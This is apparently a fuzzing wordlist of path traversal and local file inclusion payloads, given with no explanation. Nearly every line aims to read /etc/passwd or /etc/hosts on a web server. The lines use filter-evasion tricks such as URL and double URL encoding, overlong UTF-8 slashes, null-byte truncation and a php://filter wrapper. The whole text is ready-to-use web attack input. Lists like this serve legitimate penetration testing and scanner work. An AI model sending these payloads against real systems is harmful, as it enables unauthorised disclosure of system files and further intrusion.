....//....//....//etc/passwd
....\/....\/....\/etc/passwd
%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
../../../etc/passwd%00
..%252f..%252f..%252fetc%252fpasswd
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
%252e%252e%252fetc%252fpasswd
%252e%252e%252fetc%252fpasswd%00
utils/scripts/../../../../../etc/passwd
/../../../../../etc/passwd
../../../var/www/private/../../../etc/passwd
private/../../../../etc/passwd
....//....//etc/passwd
..///////..////..//////etc/passwd
/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
/var/www/../../etc/passwd
PhP://filter
/../../../../../etc/host
/../../../../../etc/hosts
